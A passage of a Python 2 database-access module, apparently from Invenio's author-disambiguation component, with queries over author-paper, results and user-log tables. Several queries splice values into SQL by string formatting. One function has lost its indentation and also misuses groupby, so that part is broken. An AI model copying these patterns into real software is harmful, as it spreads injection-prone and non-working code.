              INDEX `flag-b` (`flag`) ,
              INDEX `personid-flag-b` (`personid`,`flag`),
              INDEX `ptvrf-b` (`personid`, `bibref_table`, `bibref_value`, `bibrec`, `flag`)
              ) ENGINE = MYISAM DEFAULT CHARSET = utf8""")
    # Fixed: the closing backtick after aidPERSONIDPAPERS was missing, which
    # made this INSERT ... SELECT a MySQL syntax error, so the papers table
    # was never actually backed up.
    run_sql("""insert into `aidPERSONIDPAPERS_copy`
               select *
               from `aidPERSONIDPAPERS`""")
# ********** getters **********#
def get_papers_affected_since(date_from, date_to=None):  # personid_get_recids_affected_since
    """
    Finds the records whose bibauthorid information changed on or after
    'date_from'. A record is affected either directly (its row in
    aidPERSONIDPAPERS was touched) or indirectly (some data of one of its
    authors changed in aidPERSONIDDATA).

    @param date_from: the date after which this function will look for
           affected records.
    @type date_from: datetime.datetime
    @param date_to: upper bound for the modification date. Currently this is
           not supported and is ignored. Should be supported in the future.
    @type date_to: datetime.datetime or None
    @return: affected record ids
    @return type: intbitset
    """
    affected = run_sql("""select bibrec from aidPERSONIDPAPERS where
                       last_updated >= %s UNION ALL select bibrec
                       from aidPERSONIDPAPERS where personid in
                       (select personid from aidPERSONIDDATA where
                       last_updated >= %s)""", (date_from, date_from))
    return intbitset(affected)
def get_papers_info_of_author(pid, flag,  # get_person_papers
                              show_author_name=False,
                              show_title=False,
                              show_rt_status=False,
                              show_affiliations=False,
                              show_date=False,
                              show_experiment=False):
    '''
    Gets information for the papers that the given author is associated with.
    The information which is included depends on the enabled flags.
    e.g. get_papers_info_of_author(16591, -2, True, True, True, True, True, True) returns
       [{'affiliation': ['Hong Kong U.'],
         'authorname': 'Wong, Yung Chow',
         'data': '100:1,1',
         'date': ('1961',),
         'experiment': [],
         'flag': 0,
         'rt_status': False,
         'title': ('Isoclinic N planes in Euclidean 2N space, Clifford parallels in elliptic (2N-1) space, and the Hurwitz matrix equations',) },
         ...]

    @param pid: author identifier
    @type pid: int
    @param flag: author-paper association status (lower bound, inclusive)
    @type flag: int
    @param show_author_name: show author name for each paper
    @type show_author_name: bool
    @param show_title: show title of each paper
    @type show_title: bool
    @param show_rt_status: show if there are request tickets for the author
    @type show_rt_status: bool
    @param show_affiliations: show affiliations
    @type show_affiliations: bool
    @param show_date: show publication date
    @type show_date: bool
    @param show_experiment: show the experiment which the paper is associated with
    @type show_experiment: bool
    @return: information for each paper
    @rtype: list [{str: str, str: int, ...}]
    '''
    select = ['bibref_table', 'bibref_value', 'bibrec', 'flag']
    if show_author_name:
        select.append('name')
    select_fields_str = ", ".join(select)
    records = run_sql('select %s ' % select_fields_str +
                      'from aidPERSONIDPAPERS '
                      'where personid=%s '
                      'and flag >= %s', (pid, flag))
    # total HACK to speed up claiming for Atlas/CMS authors:
    # for big author lists the per-record recstruct fetch is too slow, so
    # fall back to get_fieldvalues when several records have huge author
    # counts.
    use_recstruct = True
    if len(records) > 100:
        aurecs = [recdata[2] for recdata in records]
        aucounts = run_sql('select termlist from idxWORD20R where id_bibrec in (%s)' % ','.join([str(r) for r in aurecs]))
        aucounts = sorted([int(deserialize_via_marshal(val[0])[0]) for val in aucounts])
        # at least 5 records with over 500 authors.
        # Guard on len(aucounts): the index may return fewer than 5 rows for
        # these records, in which case aucounts[-5] raised IndexError.
        if len(aucounts) >= 5 and aucounts[-5] > 500:
            use_recstruct = False

    def format_record(record, use_recstruct=True):
        '''
        Gets information for the paper that the record is associated with.
        Closes over 'request_tickets', which is fetched once below before the
        records are formatted.

        @param record: author-paper association record
        @type record: tuple
        @return: information for the paper
        @rtype: dict {str: str, str: int, ...}
        '''
        if show_author_name:
            table, ref, rec, flag, name = record
        else:
            table, ref, rec, flag = record
        sig_str = "%s:%d,%d" % (table, ref, rec)
        record_info = {'data': sig_str,
                       'flag': flag}
        if use_recstruct:
            recstruct = get_record(rec)
        if show_author_name:
            record_info['authorname'] = name
        if show_title:
            if use_recstruct:
                record_info['title'] = (record_get_field_value(recstruct, '245', '', '', 'a'),)
            else:
                try:
                    title = get_fieldvalues(rec, '245__a')[0]
                except IndexError:
                    title = ""
                record_info['title'] = (title,)
        if show_rt_status:
            # A paper has an open ticket when any ticket operation targets
            # this exact signature.
            record_info['rt_status'] = False
            for request_ticket in request_tickets:
                operations = request_ticket['operations']
                for action, bibrefrec in operations:
                    if bibrefrec == sig_str:
                        record_info['rt_status'] = True
                        break
        if show_affiliations:
            tag = '%s__u' % table
            record_info['affiliation'] = get_grouped_records((table, ref, rec), tag)[tag]
        if show_date:
            if use_recstruct:
                record_info['date'] = (record_get_field_value(recstruct, '269', '', '', 'c'),)
            else:
                try:
                    date = get_fieldvalues(rec, '269__c')[0]
                except IndexError:
                    date = ""
                record_info['date'] = (date,)
            try:
                ead = run_sql("SELECT earliest_date FROM bibrec WHERE id=%s", (rec, ))[0][0]
                record_info['earliest_date'] = "{0}-{1:02d}-{2:02d}".format(ead.year, ead.month, ead.day)
            except:
                # Too bad: best-effort field, skip it when bibrec has no
                # usable earliest_date.
                pass
        if show_experiment:
            if use_recstruct:
                record_info['experiment'] = (record_get_field_value(recstruct, '693', '', '', 'e'),)
            else:
                try:
                    experiment = get_fieldvalues(rec, '693__e')[0]
                except IndexError:
                    experiment = ''
                record_info['experiment'] = (experiment,)
        return record_info

    request_tickets = get_request_tickets_for_author(pid)
    return [format_record(record, use_recstruct) for record in records]
def get_names_of_author(pid, sort_by_count=True):  # get_person_db_names_count
    '''
    Collects every name variant attributed to the given author together with
    the number of occurrences of each variant; by default the result is
    ordered by decreasing occurrence count.

    @param pid: author identifier
    @type pid: int
    @param sort_by_count: sort in descending order of name count
    @type sort_by_count: bool
    @return: author names and count of each name [(name, name_count),]
    @rtype: list [(str, int),]
    '''
    refs = run_sql("""select bibref_table, bibref_value
                      from aidPERSONIDPAPERS
                      where personid=%s
                      and flag > -2""",
                   (pid,))
    bibref_values100 = [value for table, value in refs if table == '100']
    bibref_values700 = [value for table, value in refs if table == '700']
    # Count occurrences of each bibref value manually (same result as the
    # old sorted+groupby pipeline, without the pre-sort).
    counts100 = dict()
    for value in bibref_values100:
        counts100[value] = counts100.get(value, 0) + 1
    counts700 = dict()
    for value in bibref_values700:
        counts700[value] = counts700.get(value, 0) + 1
    ids_names100 = tuple()
    if bibref_values100:
        bibref_value100_sqlstr = _get_sqlstr_from_set(bibref_values100)
        ids_names100 = run_sql("""select id, value
                                  from bib10x
                                  where id in %s"""
                               % bibref_value100_sqlstr)
    ids_names700 = tuple()
    if bibref_values700:
        bibref_value700_sqlstr = _get_sqlstr_from_set(bibref_values700)
        ids_names700 = run_sql("""select id, value
                                  from bib70x
                                  where id in %s"""
                               % bibref_value700_sqlstr)
    names_count = [(name, counts100[nid]) for nid, name in ids_names100]
    names_count += [(name, counts700[nid]) for nid, name in ids_names700]
    if sort_by_count:
        names_count.sort(key=itemgetter(1), reverse=True)
    return names_count
def get_matchable_name_of_author(pid):
    """
    Fetches the matchable (normalized) name currently stored for this person
    in aidPERSONIDPAPERS.

    @param pid: the person id of the author
    @return: The matchable name of the author
    """
    rows = run_sql('select distinct m_name from aidPERSONIDPAPERS where personid=%s', (pid,))
    return rows[0][0]
def merger_errors_exist():  # check_merger
    '''
    It examines if the merger introduced any error to the author-paper
    associations (e.g. loss of claims/signatures, creation of new
    claims/signatures). It presumes that copy_personid was called before the
    merger.

    @return: True when NO merger errors are found, False otherwise (note:
        despite the function name, the returned flag means "all consistent")
    @rtype: bool
    '''
    all_ok = True
    # Claims and rejections (flag == +/-2) must be identical before/after.
    old_claims = set(run_sql("""select personid, bibref_table, bibref_value, bibrec, flag
                                from aidPERSONIDPAPERS_copy
                                where (flag=-2 or flag=2)"""))
    cur_claims = set(run_sql("""select personid, bibref_table, bibref_value, bibrec, flag
                                from aidPERSONIDPAPERS
                                where (flag=-2 or flag=2)"""))
    errors = ((old_claims - cur_claims, "Some claims were lost during the merge."),
              (cur_claims - old_claims, "Some new claims appeared after the merge."))
    action = {-2: 'Rejection', 2: 'Claim'}
    for claims, message in errors:
        if claims:
            all_ok = False
            logger.log(message)
            logger.log("".join("    %s: personid %d %d:%d,%d\n" %
                               (action[cl[4]], cl[0], int(cl[1]), cl[2], cl[3]) for cl in claims))
    # The full set of signatures (regardless of flag) must also survive.
    old_sigs = set(run_sql("""select bibref_table, bibref_value, bibrec
                              from aidPERSONIDPAPERS_copy"""))
    # where (flag <> -2 and flag <> 2)
    cur_sigs = set(run_sql("""select bibref_table, bibref_value, bibrec
                              from aidPERSONIDPAPERS"""))
    # where (flag <> -2 and flag <> 2)
    errors = ((old_sigs - cur_sigs, "Some signatures were lost during the merge."),
              (cur_sigs - old_sigs, "Some new signatures appeared after the merge."))
    for sigs, message in errors:
        if sigs:
            all_ok = False
            logger.log(message)
            logger.log("".join("    %s:%d,%d\n" % sig for sig in sigs))
    return all_ok
#
#
# aidRESULTS table ###
#
#
# ********** setters **********#
def save_cluster(named_cluster):
    '''
    Persists one disambiguation cluster of papers, stored under the
    surname-derived name it was given.

    @param named_cluster: named cluster of papers
    @type named_cluster: Cluster
    '''
    cluster_name, cluster = named_cluster
    for bibref_table, bibref_value, bibrec in cluster.bibs:
        run_sql("""insert into aidRESULTS
                   (personid, bibref_table, bibref_value, bibrec)
                   values (%s, %s, %s, %s)""",
                (cluster_name, str(bibref_table), bibref_value, bibrec))
def remove_clusters_by_name(surname):  # remove_result_cluster
    '''
    Deletes all clusters which belong to authors who carry the specified
    surname.

    @param surname: author surname
    @type surname: str
    '''
    # Bind the pattern as a query parameter (consistent with
    # get_clusters_by_surname) instead of interpolating it into the SQL
    # string, which broke on surnames containing quote characters.
    run_sql("""delete from aidRESULTS
               where personid like %s""",
            (surname + '.%',))
def empty_tortoise_results_table():  # empty_results_table
    '''
    Truncates the disambiguation algorithm results table (aidRESULTS).
    '''
    _truncate_table('aidRESULTS')
# ********** getters **********#
def get_clusters_by_surname(surname):  # get_lastname_results
    '''
    Fetches every disambiguation algorithm result record belonging to authors
    carrying the given surname.

    @param surname: author surname
    @type surname: str
    @return: disambiguation algorithm result records ((pid, bibref_table, bibref_value, bibrec),)
    @rtype: tuple ((str, str, int, int),)
    '''
    pattern = surname + '.%'
    return run_sql("""select personid, bibref_table, bibref_value, bibrec
                      from aidRESULTS
                      where personid like %s""",
                   (pattern,))
def get_cluster_names():  # get_existing_result_clusters
    '''
    Gets all cluster names currently present in the disambiguation results.

    @return: cluster names (one-element tuples, as returned by the query)
    @rtype: set set((str,),)
    '''
    return set(run_sql("""select personid
                          from aidRESULTS"""))
def duplicated_tortoise_results_exist(): # check_results
'''
It examines if there are duplicated records in the disambiguation algorithm
results (e.g. same signature assigned to two different authors or same
paper assigned to same author more than once).
@return: duplicated records in the disambiguation algorithm results exist
@rtype: bool
'''
duplicated_tortoise_results_not_found = True
disambiguation_results = run_sql("""select personid, bibref_table, bibref_value, bibrec
from aidRESULTS""")
keyfunc = lambda x: x[1:]
disambiguation_results = sorted(disambiguation_results, key=keyfunc)
duplicated_results = [list(sig_holders)
for _, sig_holders in groupby(disambiguation_results, key=keyfunc) if len(list(sig_holders)) > 1]
for duplicates in duplicated_results:
duplicated_tortoise_results_not_found = False
for duplicate in duplicates:
print "Duplicated row in aidRESULTS"
print "%s %s %s %s" % duplicate
print
clusters = dict()
for name, _, _, rec in disambiguation_results:
clusters[name] = clusters.get(name, []) + [rec]
faulty_clusters = dict((name, len(recs) - len(set(recs)))
for name, recs in clusters.items() if not len(recs) == len(set(recs)))
if faulty_clusters:
duplicated_tortoise_results_not_found = False
print "Recids NOT unique in clusters!"
print ("A total of %s clusters hold an average of %.2f duplicates" %
(len(faulty_clusters), (sum(faulty_clusters.values()) / float(len(faulty_clusters)))))
for name in faulty_clusters:
print "Name: %-20s Size: %4d Faulty: %2d" % (name, len(clusters[name]), faulty_clusters[name])
return duplicated_tortoise_results_not_found
#
#
# aidUSERINPUTLOG table ###
#
#
# ********** setters **********#
def insert_user_log(userinfo, pid, action, tag, value, comment='', transactionid=0, timestamp=None, userid=0):
    '''
    Inserts one user log entry with the specified attributes. When no
    timestamp is supplied the database clock (now()) is used.

    @param userinfo: user identifier and IP (e.g. 29||128.141.29.241)
    @type userinfo: str
    @param pid: author identifier
    @type pid: int
    @param action: action
    @type action: str
    @param tag: tag
    @type tag: str
    @param value: transaction value
    @type value: str
    @param comment: comment for the transaction
    @type comment: str
    @param transactionid: transaction identifier
    @type transactionid: int
    @param timestamp: entry timestamp
    @type timestamp: datetime.datetime
    @param userid: user identifier
    @type userid: int
    @return: transaction identifier (the one that was passed in)
    @rtype: int
    '''
    if timestamp is not None:
        run_sql("""insert into aidUSERINPUTLOG
                   (transactionid, timestamp, userinfo, userid, personid, action, tag, value, comment)
                   values (%s, %s, %s, %s, %s, %s, %s, %s, %s)""",
                (transactionid, timestamp, userinfo, userid, pid, action, tag, value, comment))
    else:
        run_sql("""insert into aidUSERINPUTLOG
                   (transactionid, timestamp, userinfo, userid, personid, action, tag, value, comment)
                   values (%s, now(), %s, %s, %s, %s, %s, %s, %s)""",
                (transactionid, userinfo, userid, pid, action, tag, value, comment))
    return transactionid
# ********** getters **********#
def get_user_logs(transactionid=None, userid=None, userinfo=None, pid=None, action=None, tag=None, value=None, comment=None, only_most_recent=False):  # get_user_log
    '''
    Gets the user log entries with the specified attributes. If no parameters
    are given it returns all log entries.

    @param transactionid: transaction identifier
    @type transactionid: int
    @param userid: user identifier
    @type userid: int
    @param userinfo: user identifier and IP (e.g. 29||128.141.29.241)
    @type userinfo: str
    @param pid: author identifier
    @type pid: int
    @param action: action
    @type action: str
    @param tag: tag
    @type tag: str
    @param value: transaction value
    @type value: str
    @param comment: comment for the transaction
    @type comment: str
    @param only_most_recent: only most recent log entry
    @type only_most_recent: bool
    @return: log entries ((id, transactionid, timestamp, userinfo, pid, action, tag, value, comment),)
    @rtype: tuple ((int, int, datetime.datetime, str, int, str, str, str, str),)
    '''
    conditions = list()
    add_condition = conditions.append
    args = list()
    add_arg = args.append
    if transactionid is not None:
        add_condition('transactionid=%s')
        add_arg(transactionid)
    if userid is not None:
        add_condition('userid=%s')
        add_arg(userid)
    if userinfo is not None:
        add_condition('userinfo=%s')
        add_arg(str(userinfo))
    if pid is not None:
        # The column in aidUSERINPUTLOG is 'personid' (see insert_user_log
        # and the select list below); the previous 'pid=%s' filter referenced
        # a non-existent column.
        add_condition('personid=%s')
        add_arg(pid)
    if action is not None:
        add_condition('action=%s')
        add_arg(str(action))
    if tag is not None:
        add_condition('tag=%s')
        add_arg(str(tag))
    if value is not None:
        add_condition('value=%s')
        add_arg(str(value))
    if comment is not None:
        add_condition('comment=%s')
        add_arg(str(comment))
    query = """select id, transactionid, timestamp, userinfo, personid, action, tag, value, comment
               from aidUSERINPUTLOG"""
    # Only emit a 'where' clause when there are conditions: the old code
    # produced a dangling 'where' (invalid SQL) when called with no filters,
    # contradicting the docstring's "returns all log entries".
    if conditions:
        query += " where " + " and ".join(conditions)
    if only_most_recent:
        query += ' order by timestamp desc limit 0,1'
    return run_sql(query, tuple(args))
#
#
# other table ###
#
#
# ********** setters **********#
def set_dense_index_ready():
    '''
    Sets the search engine dense index ready to use.

    Readiness is signalled by inserting a sentinel row with flag=-1 into
    aidDENSEINDEX.
    '''
    run_sql("""insert into aidDENSEINDEX
               (flag)
               values (%s)""",
            (-1,))
def set_inverted_lists_ready():
    '''
    Sets the search engine inverted lists ready to use.

    Readiness is signalled by a sentinel row whose qgram is a run of '!'
    characters of length QGRAM_LEN (which cannot occur as a real qgram).
    '''
    run_sql("""insert into aidINVERTEDLISTS
               (qgram, inverted_list, list_cardinality)
               values (%s,%s,%s)""",
            ('!' * bconfig.QGRAM_LEN, '', 0))
# ********** getters **********#
def get_matching_bibrefs_for_paper(names, rec, always_match=False):  # get_possible_bibrecref
    '''
    Gets the bibrefs which match any of the surnames of the specified names and
    are associated with the given paper. If 'always_match' flag is enabled it
    gets all bibrefs associated to the given paper.

    @param names: author names
    @type names: list [str,]
    @param rec: paper identifier
    @type rec: int
    @param always_match: get all bibrefs associated to the given paper
    @type always_match: bool
    @return: bibrefs [[bibref_table:bibref_value, name],]
    @rtype: list [[str, str],]
    '''
    # Hoist the surname extraction and lower-casing out of the per-bibref
    # loops: only the surname (first name part) is ever compared.
    surnames = set(split_name_parts(name)[0].lower() for name in names)
    bib10x_names = run_sql("""select o.id, o.value
                              from bib10x o, (select i.id_bibxxx as iid
                                              from bibrec_bib10x i
                                              where id_bibrec=%s) as dummy
                              where o.tag='100__a'
                              and o.id=dummy.iid""",
                           (rec,))
    bib70x_names = run_sql("""select o.id, o.value
                              from bib70x o, (select i.id_bibxxx as iid
                                              from bibrec_bib70x i
                                              where id_bibrec=%s) as dummy
                              where o.tag='700__a'
                              and o.id = dummy.iid""",
                           (rec,))
    bibrefs = list()
    seen = set()  # set-based dedup instead of the old O(n^2) list membership
    for table, rows in (('100', bib10x_names), ('700', bib70x_names)):
        for ref_id, ref_name in rows:
            if always_match or split_name_parts(ref_name)[0].lower() in surnames:
                key = (table, ref_id, ref_name)
                if key not in seen:
                    seen.add(key)
                    bibrefs.append([table + ':' + str(ref_id), ref_name])
    return bibrefs
def get_collaborations_for_paper(rec):  # get_collaboration
    '''
    Looks up the collaborations (710__g) which the given paper is associated
    with.

    @param rec: paper identifier
    @type rec: int
    @return: collaborations
    @rtype: list [str,]
    '''
    linked_ids = run_sql("""select id_bibxxx
                            from bibrec_bib71x
                            where id_bibrec=%s""",
                         (rec,))
    if not linked_ids:
        return []
    ids_sqlstr = _get_sqlstr_from_set(linked_ids, lambda row: row[0])
    rows = run_sql("""select value
                      from bib71x
                      where id in %s
                      and tag like '%s'"""
                   % (ids_sqlstr, "710__g"))
    return [row[0] for row in rows]
def get_keywords_for_paper(rec):  # get_key_words
    '''
    Gets the keywords which the given paper is associated with.

    @param rec: paper identifier
    @type rec: int
    @return: keywords
    @rtype: list [str,]
    '''
    # ADS installations store keywords under a different MARC tag (6531_a)
    # than standard ones (695__a).
    if bconfig.CFG_ADS_SITE:
        bibxxx_ids = run_sql("""select id_bibxxx
                                from bibrec_bib65x
                                where id_bibrec=%s""",
                             (rec,))
    else:
        bibxxx_ids = run_sql("""select id_bibxxx
                                from bibrec_bib69x
                                where id_bibrec=%s""",
                             (rec,))
    if not bibxxx_ids:
        return list()
    bibxxx_ids_sqlstr = _get_sqlstr_from_set(bibxxx_ids, lambda x: x[0])
    if bconfig.CFG_ADS_SITE:
        # NOTE(review): the ids above come from bibrec_bib65x but are looked
        # up in bib69x here (tag 6531_a would normally live in bib65x) --
        # confirm whether this branch should query bib65x instead.
        keywords = run_sql("""select value
                              from bib69x
                              where id in %s
                              and tag like '%s'"""
                           % (bibxxx_ids_sqlstr, "6531_a"))
    else:
        keywords = run_sql("""select value
                              from bib69x
                              where id in %s
                              and tag like '%s'"""
                           % (bibxxx_ids_sqlstr, "695__a"))
    return [k[0] for k in keywords]
def get_authors_of_paper(rec):  # get_all_authors
    '''
    Collects the author and coauthor name strings (100__a and 700__a values)
    attached to the given paper.

    @param rec: paper identifier
    @type rec: int
    @return: author name strings
    @rtype: list [str,]
    '''
    ids100 = run_sql("""select id_bibxxx
                        from bibrec_bib10x
                        where id_bibrec=%s""",
                     (rec,))
    names100 = tuple()
    if ids100:
        sqlstr100 = _get_sqlstr_from_set(ids100, lambda row: row[0])
        names100 = run_sql("""select value
                              from bib10x
                              where tag='%s'
                              and id in %s"""
                           % ('100__a', sqlstr100))
    ids700 = run_sql("""select id_bibxxx
                        from bibrec_bib70x
                        where id_bibrec=%s""",
                     (rec,))
    names700 = tuple()
    if ids700:
        sqlstr700 = _get_sqlstr_from_set(ids700, lambda row: row[0])
        names700 = run_sql("""select value
                              from bib70x
                              where tag='%s'
                              and id in %s"""
                           % ('700__a', sqlstr700))
    return [name[0] for name in chain(names100, names700)]
def get_title_of_paper(rec, recstruct=None):  # get_title_from_rec
    '''
    Gets the title which the specified paper carries.

    @param rec: paper identifier
    @type rec: int
    @param recstruct: pre-fetched record structure; when given, the title is
        read from it instead of querying the field values
    @return: title (empty string when the record has no 245__a)
    @rtype: str
    '''
    if not recstruct:
        try:
            # NOTE(review): other call sites pass a bare recid to
            # get_fieldvalues (e.g. get_papers_info_of_author); confirm the
            # list-wrapped argument here is intended.
            title = get_fieldvalues([rec], '245__a')[0]
            return title
        except IndexError:
            return ""
    else:
        return record_get_field_value(recstruct, '245', '', '', 'a')
def get_doi_for_paper(recid, recstruct=None):  # get_doi_from_rec
    '''
    Gets the dois which the specified paper is associated with.

    @param recid: paper identifier
    @type recid: int
    @param recstruct: pre-fetched record structure (fetched from recid when
        not given)
    @return: dois (e.g. ['10.1103/PhysRevD.1.1967'])
    @rtype: list [str,]
    '''
    if not recstruct:
        recstruct = get_record(recid)
    inst = record_get_field_instances(recstruct, '024', '%')
    dois = list()
    for couple in inst:
        couple = dict(couple[0])
        # A 024 field holds a doi only when its '2' subfield says so; fields
        # with a missing/non-string subfield are skipped. The previous bare
        # 'except' silently swallowed *every* error here.
        try:
            if couple['2'].lower() == 'doi':
                dois.append(couple['a'])
        except (KeyError, AttributeError):
            pass
    return dois
def get_modified_papers_since(since):  # get_recently_modified_record_ids
    '''
    Finds the valid papers whose modification date is at least as recent as
    the given one.

    @param since: consider only papers which are modified after this date
    @type since: datetime.datetime
    @return: paper identifiers
    @rtype: frozenset frozenset(int,)
    '''
    rows = run_sql("""select id from bibrec
                      where modification_date >= %s""",
                   (since,))
    changed = frozenset(row[0] for row in rows)
    # Restrict to records that are currently valid (e.g. not deleted).
    return changed & frozenset(get_all_valid_bibrecs())
def get_modified_papers_before(recs, before):  # filter_modified_record_ids
    '''
    Filters the given signatures, keeping only those whose paper has a
    modification date older than the specified one.

    @param recs: signatures (the paper identifier is the third element)
    @type recs: list [(_, _, int),]
    @param before: consider only papers which are modified before this date
    @type before: datetime.datetime
    @return: the signatures whose paper was modified before 'before'
    @rtype: list [(_, _, int),]
    '''
    if not recs:
        return list()
    recs_sqlstr = _get_sqlstr_from_set([rec[2] for rec in recs])
    modified_recs = run_sql("""select id from bibrec
                               where id in %s
                               and modification_date < '%s'"""
                            % (recs_sqlstr, before))
    # Use a set for the membership test: the previous list-based lookup made
    # the final filter quadratic in the number of signatures.
    modified_ids = set(row[0] for row in modified_recs)
    return [rec for rec in recs if rec[2] in modified_ids]
def _get_author_refs_from_db_of_paper(rec):  # _get_authors_from_paper_from_db
    '''
    Collects all first-author (100__a) refs for the specified paper.

    @param rec: paper identifier
    @type rec: int
    @return: author refs
    @rtype: tuple ((int),)
    '''
    linked = run_sql("""select id_bibxxx
                        from bibrec_bib10x
                        where id_bibrec=%s""",
                     (rec,))
    if not linked:
        return ()
    linked_sqlstr = _get_sqlstr_from_set(linked, lambda row: row[0])
    return run_sql("""select id from bib10x
                      where tag='100__a'
                      and id in %s"""
                   % linked_sqlstr)
def _get_coauthor_refs_from_db_of_paper(rec):  # _get_coauthors_from_paper_from_db
    '''
    Collects all coauthor (700__a) refs for the specified paper.

    @param rec: paper identifier
    @type rec: int
    @return: coauthor refs
    @rtype: tuple ((int),)
    '''
    linked = run_sql("""select id_bibxxx
                        from bibrec_bib70x
                        where id_bibrec=%s""",
                     (rec,))
    if not linked:
        return ()
    linked_sqlstr = _get_sqlstr_from_set(linked, lambda row: row[0])
    return run_sql("""select id
                      from bib70x
                      where tag='700__a'
                      and id in %s"""
                   % linked_sqlstr)
def get_bib10x():
    '''
    Gets all existing author (100__a) name identifiers and according values.

    @return: name identifiers and according values
    @rtype: tuple ((int, str),)
    '''
    return run_sql("""select id, value
                      from bib10x
                      where tag like %s""",
                   ("100__a",))
def get_bib70x():
    '''
    Gets all existing coauthor (700__a) name identifiers and according values.

    @return: name identifiers and according values
    @rtype: tuple ((int, str),)
    '''
    return run_sql("""select id, value
                      from bib70x
                      where tag like %s""",
                   ("700__a",))
def get_user_id_by_email(email):
    '''
    Looks up the user identifier associated with the given email.

    @param email: email
    @type email: str
    @return: user identifier, or None when no user carries that email
    @rtype: int or None
    '''
    rows = run_sql("""select id
                      from user
                      where email=%s""", (email,))
    if not rows:
        return None
    return rows[0][0]
def get_name_variants_for_authors(authors):  # get_indexable_name_personids
    '''
    Maps each of the given author identifiers to its deserialized name
    variants, as stored in the dense index (flag=1 rows of aidDENSEINDEX).

    @param authors: author identifiers
    @type authors: list [int,]
    @return: author identifier -> deserialized name variants
    @rtype: dict {int: object}
    '''
    rows = []
    if len(authors):
        rows = run_sql("""select id, personids
                          from aidDENSEINDEX
                          where id in %s
                          and flag=1"""
                       % _get_sqlstr_from_set(authors))
    seen_authors = list()
    mapping = dict()
    for author_id, serialized_names in rows:
        seen_authors.append(author_id)
        mapping[author_id] = deserialize(serialized_names)
    # Sanity check: the dense index must not contain duplicate author rows.
    assert len(seen_authors) == len(set(seen_authors))
    return mapping
def get_author_groups_from_string_ids(indexable_name_ids):  # get_indexable_name_personids
    '''
    Gets the serialized author-identifier groups stored in the dense index
    (flag=0 rows of aidDENSEINDEX) for the specified indexable name
    identifiers.

    @param indexable_name_ids: indexable name identifiers
    @type indexable_name_ids: list [int,]
    @return: serialized author identifier groups ((personids,),)
    @rtype: tuple ((bytes,),)
    '''
    return run_sql("""select personids
                      from aidDENSEINDEX
                      where id in %s
                      and flag=0"""
                   % _get_sqlstr_from_set(indexable_name_ids))
def get_indexed_strings(string_ids):  # get_indexable_name_personids
    '''
    Maps each indexable string stored under the given identifiers (flag=0
    rows of aidDENSEINDEX) to its identifier and indexable surname.

    @param string_ids: indexable string identifiers
    @type string_ids: list [int,]
    @return: {indexable_string: {'sid': id, 'surname': indexable_surname}}
    @rtype: dict {str: dict}
    '''
    rows = run_sql("""select id, indexable_string, indexable_surname
                      from aidDENSEINDEX
                      where id in %s
                      and flag=0"""
                   % (_get_sqlstr_from_set(string_ids),))
    return dict((string, {'sid': sid, 'surname': surname})
                for sid, string, surname in rows)
def _get_grouped_records_from_db(sig, *args):
    '''
    Gets the records from bibmarcx table which are grouped together with the
    paper specified in the given signature and carry a tag from 'args'.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (str, str, str)
    @param args: tags
    @type args: tuple (str,)
    @return: {tag: [extracted_value,]}
    @rtype: dict {str: [str,]}
    '''
    table, ref, rec = sig
    # e.g. table '100' -> bib10x and its mapping table bibrec_bib10x.
    target_table = "bib%sx" % (str(table)[:-1])
    mapping_table = "bibrec_%s" % target_table
    # field_number groups the subfields of one MARC field instance together.
    group_id = run_sql("""select field_number
                          from %s
                          where id_bibrec=%s
                          and id_bibxxx=%s"""
                       % (mapping_table, rec, ref))
    if not group_id:
        # the mapping is not found
        return dict((tag, list()) for tag in args)
    elif len(group_id) == 1:
        field_number = group_id[0][0]
    else:
        # ignore the error: the same bibref appears in several field
        # instances; arbitrarily pick the lowest field number.
        field_number = min(i[0] for i in group_id)
    grouped = run_sql("""select id_bibxxx
                         from %s
                         where id_bibrec=%s
                         and field_number=%s"""
                      % (mapping_table, rec, field_number))
    # NOTE(review): the message says "at most one" but the check enforces
    # "at least one" grouped value -- confirm which invariant is intended.
    assert len(grouped) > 0, "There should be at most one grouped value per tag."
    grouped_sqlstr = _get_sqlstr_from_set(grouped, lambda x: str(x[0]))
    res = dict()
    for tag in args:
        values = run_sql("""select value
                            from %s
                            where tag like '%%%s%%'
                            and id in %s"""
                         % (target_table, tag, grouped_sqlstr))
        res[tag] = [value[0] for value in values]
    return res
def get_signatures_from_bibrefs(bibrefs):
    '''
    Expands the given bibrefs into all their valid signatures, i.e. the
    (bibref_table, bibref_value, bibrec) triples whose record is valid.

    @param bibrefs: bibrefs set((bibref_table, bibref_value),)
    @type bibrefs: set set((int, int),)
    @return: signatures ((bibref_table, bibref_value, bibrec),)
    @rtype: list [(int, int, int),]
    '''
    sig10x = tuple()
    refs100 = [bibref for bibref in bibrefs if bibref[0] == 100]
    if refs100:
        sqlstr100 = _get_sqlstr_from_set(refs100, lambda x: x[1])
        sig10x = run_sql("""select 100, id_bibxxx, id_bibrec
                            from bibrec_bib10x
                            where id_bibxxx in %s"""
                         % sqlstr100)
    sig70x = tuple()
    refs700 = [bibref for bibref in bibrefs if bibref[0] == 700]
    if refs700:
        sqlstr700 = _get_sqlstr_from_set(refs700, lambda x: x[1])
        sig70x = run_sql("""select 700, id_bibxxx, id_bibrec
                            from bibrec_bib70x
                            where id_bibxxx in %s"""
                         % sqlstr700)
    valid_recs = set(get_all_valid_bibrecs())
    all_sigs = chain(set(sig10x), set(sig70x))
    return [sig for sig in all_sigs if sig[2] in valid_recs]
def get_resolved_affiliation(ambiguous_aff):  # resolve_affiliation
    """
    Resolves an ambiguous affiliation string to its normalized form. This is
    only meaningful in the context of author disambiguation in ADS: no other
    platform provides the ads_affiliations table used here.

    @warning: to be used in an ADS context only
    @param ambiguous_aff: ambiguous affiliation
    @type ambiguous_aff: str
    @return: the normalized version of the affiliation, or "None"
    @rtype: str
    """
    if not ambiguous_aff or not bconfig.CFG_ADS_SITE:
        return "None"
    resolved = run_sql("""select aff_id
                          from ads_affiliations
                          where affstring=%s""",
                       (ambiguous_aff,))
    if resolved:
        return resolved[0][0]
    return "None"
def _get_name_from_db_by_bibref(bibref):  # _get_name_by_bibrecref_from_db
    '''
    Gets the author name which is associated with the given bibref.

    @param bibref: bibref (bibref_table, bibref_value)
    @type bibref: tuple (int, int)
    @return: name
    @rtype: str
    '''
    table = "bib%sx" % str(bibref[0])[:-1]
    tag = "%s__a" % bibref[0]
    ref = bibref[1]
    # The table name cannot be bound as a SQL parameter, but id and tag can:
    # bind them instead of interpolating to avoid quoting issues.
    query = """select value
               from %s
               where id=%%s
               and tag=%%s""" % table
    name = run_sql(query, (ref, tag))
